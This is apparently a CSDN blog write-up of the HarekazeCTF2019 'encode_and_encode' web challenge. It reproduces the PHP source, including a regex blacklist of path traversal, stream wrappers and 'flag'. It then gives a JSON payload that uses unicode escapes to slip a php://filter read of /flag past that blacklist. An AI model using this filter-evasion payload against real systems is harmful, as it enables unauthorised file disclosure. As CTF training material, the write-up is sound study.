[HarekazeCTF2019]encode_and_encode

于 2021-09-24 16:33:11 发布
阅读量249 收藏
点赞数 1
分类专栏: CTF 文章标签: php json CTF BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45646006/article/details/120458079
版权

[HarekazeCTF2019]encode_and_encode

打开网页,点击source链接,发现源代码:

<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);

查阅PHP手册:

implode
(PHP 4, PHP 5, PHP 7, PHP 8)
implode — 将一个一维数组的值转化为字符串

php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input的方式与$HTTP_RAW_POST_DATA数据都同样不适用于表单提交的multipart/form-data类型数据

References

file_get_contents(“php://input”)的用法

file_get_contents(“php://input”, “r”)实例介绍_php技巧_脚本之家

php file_get_contents('php://input') 详细解 | Android & HTML5

file_get_contents(‘php://input’)要接收POST数据,需要POST提交json数据并用json_encode转一下。

References

https://www.cnblogs.com/phpper/p/9574419.html

  • 仅在取值为application/x-www-data-urlencodedmultipart/form-data时(文件上传时),php会将http请求body相应数据会填入到数组 P O S T , 填 入 到 _POST,填入到 POST_POST数组中的数据是进行urldecode()解析的结果。
  • 只要Content-Type不为multipart/form-dataphp://input会填入post数据。
  • 仅当Content-Type为application/x-www-form-urlencoded且提交方法是POST方法时,$_POST数据与php://input数据才是一致的。

References

输入流 php://input

JSON 在decode时 会把\U****给转义。那么就可以绕过黑名单了。

References

https://mayi077.gitee.io/2020/05/21/HarekazeCTF2019-encode-and-encode/

payload:

{ "page" : "\u0070\u0068\u0070://filter/convert.base64-encode/resource=/\u0066\u006c\u0061\u0067"}

在响应中得到内容:

{"content":"ZmxhZ3swYTIxNTE2MC03NTM3LTQ5YTctYmFlMC1jYTE5YmQ1ZDI1Y2F9Cg=="}

base64解码后得到flag。

yym68686
关注
专栏目录
CTF比赛编码工具Captfencoder-1.3.0
09-21
CaptfEncoder是一款跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、特殊编码等工具,并聚合各类在线工具。Ascii Encoding Web Encoding Hex Encoding Unicode Encoding Base64(Base16、Base32、Base58) Url Encoding Html Entity Encoding Escape Encoding Quoted-printable(可打印字符引用编码) Morse Code(莫尔斯电码) Tap Code(敲击码)
jpeg-encode.zip_jpeg_jpeg encode_jpeg encode linux_linux视频监控_视频监
07-15
标题中的“jpeg-encode.zip_jpeg_jpeg encode_jpeg encode linux_linux视频监控_视频监”表明这个压缩包可能包含了一组用于在Linux环境下进行JPEG编码的工具或代码库,特别适用于资源有限的嵌入式系统,例如视频监控...
encode.rar_15 11汉明码_Matlab中encode_breakfastarr_matlab里encode_(1
07-15
这个压缩包文件“encode.rar_15 11汉明码_Matlab中encode_breakfastarr_matlab里encode_(1”包含了使用MATLAB实现(15,11)汉明码编码和解码过程的资源。 MATLAB是一款强大的数学计算软件,广泛应用于科研和工程...
JPEG_Encode_verilog.rar_JPEG verilog_JPEG_Encode_verilog_Verilo
09-20
在“JPEG_Encode_verilog”这个项目中,Verilog源代码被用于创建一个硬件级别的JPEG编码器。Verilog是一种硬件描述语言(HDL),常用于设计数字系统的逻辑,包括FPGA和ASIC等。使用Verilog可以将JPEG编码过程的算法...
encode_geohash.rar_geohash_geohash encode_matlab与geohash
09-23
在给定的“encode_geohash.rar”压缩包中,包含了一个名为“encode_geohash.m”的MATLAB程序,这是对GeoHash编码的一种实现。MATLAB作为一种强大的数学计算环境,常用于各种科学计算和数据分析,包括地理信息系统...
Turbo_encode_decode.rar_sova算法_turbo decode_turbo encode_turbo e
07-14
Turbo码编译码的matlab源代码,包括logMAP算法与SOVA算法。可设置信道SNR参数,帧长度,删余系数等。
[HarekazeCTF2019]encode_and_encode 1
wuyaowangchuan的博客
03-04 837
源代码里面有代码 <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):'.
[HarekazeCTF2019]encode_and_encodejson字符转义)
qq_44657899的博客
11-14 963
<?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):', // n.
[harekazectf2019]encode_and_encode
最新发布
04-06
txt = 'HarekazeCTF{TestTestTest}' txt = hashlib.sha512(txt.encode('ascii')).hexdigest() txt = codecs.encode(txt.encode('ascii'), 'rot13') txt = base64.b64encode(txt.encode('ascii')).decode('ascii') ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值